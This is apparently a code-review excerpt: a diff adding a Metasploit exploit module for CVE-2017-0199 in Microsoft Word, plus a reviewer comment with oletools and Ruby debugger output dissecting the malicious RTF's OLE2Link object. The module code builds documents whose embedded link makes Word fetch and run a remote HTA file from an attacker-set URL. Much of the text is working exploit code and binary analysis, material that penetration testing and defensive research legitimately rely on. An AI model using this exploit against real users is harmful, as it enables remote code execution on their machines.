modules/exploits/windows/fileformat/office_word_hta.rb

```diff
@@ -0,0 +1,132 @@
+        in Oct 2016. This module was created by reversing a public
+        malware sample.
+      },
+      'Author'         =>
+        [
+          'Haifei Li', # vulnerability analysis
+          'ryHanson',
+          'wdormann',
+          'DidierStevens',
+          'vysec',
+          'Nixawk' # module developer
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2017-0199'],
+        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
+        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
+        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
+        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
+        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
+        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
+        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
+        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
+        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
+        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Microsoft Office Word', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 14 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The path to a online hta file.', 'http://example.com/test.rtf'])
+      ], self.class)
+  end
+
+  def generate_uri
+    uri_maxlength = 112
+
+    uri = datastore['TARGETURI']
+    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
+    uri.delete!("\n")
+    uri.delete!("\\x")
+    uri.delete!("\\")
+
+    padding_length = uri_maxlength * 2 - uri.length
+    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
+    padding_length.times { uri << "0" }
+    uri
+  end
+
+  def create_ole_ministream_data
+    # require 'rex/ole'
+    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+    # ministream = ole.instance_variable_get(:@ministream)
+    # ministream_data = ministream.instance_variable_get(:@data)
```

Comment:
RTF may be not a corrupted document. Please check my steps.

----

Original RTF is created by Office Word 2010 on Windows 7.  I've try to recreate a new one with the same issue.

Show OLE Object info with [oletools](https://github.com/decalage2/oletools) -  **rtfobj**
```
$ rtfobj cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
```

Dump OLE object with rtfobj.

```
$ rtfobj -s 0 cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'OLE2Link'
  data size  = 2560
  saving to file cve-2017-0199.rtf_object_00002A2A.bin
```

When rtf is dumped successfully,  Please try to parse OLE Object binary data with [read_oleobject.rb](https://github.com/nixawk/labs/blob/master/CVE-2017-0199/read_oleobject.rb)

```
$ ruby read_oleobject.rb cve-2017-0199.rtf_object_00002A2A.bin
4
- #<Dirent:"Root Entry">
  |- #<Dirent:"\u0001Ole" size=162 data="\x01\x00\x00\x02\t...">
  |- #<Dirent:"\u0003ObjInfo" size=6 data="\x10\x02\x03\x00\x04\x00">
  \- #<Dirent:"\u0003LinkInfo" size=102 data="\x1E\x00htt...">

From: /Users/Open-Security/Code/labs/CVE-2017-0199/read_oleobject.rb @ line 26 Object#read_ole_ministream:

    14: def read_ole_ministream(filename)
    15:   # ole/storage
    16:   ole = Ole::Storage.open(filename, 'rb+')
    17:   puts ole.dirents.length
    18:   puts ole.root.to_tree
    19:
    20:   # rex/ole
    21:   ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    22:   ministream = ole.instance_variable_get(:@ministream)
    23:   data = ministream.instance_variable_get(:@data)
    24:
    25:
 => 26:   binding.pry
    27:
    28:   olebin = ::File.open("#{filename}-ministream_data.bin", 'wb+')
    29:   olebin.write(data)
    30:   olebin.close
    31: end

[1] pry(main)> data
=> "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\v>\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00 \xED\xE0P\x9D\xB8\xD2\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB1\x00\x05\x00\x10\x00\b\x01\x10\x02\x03\x00\x04\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAC\x00\x05\x00\x1F\x00\b\x01\xC0\x81\xA7\bx\x01\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00http://www.baidu.com/index.htm\x00\x00\xBB\xBB\xCC\xCC\x1E\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
```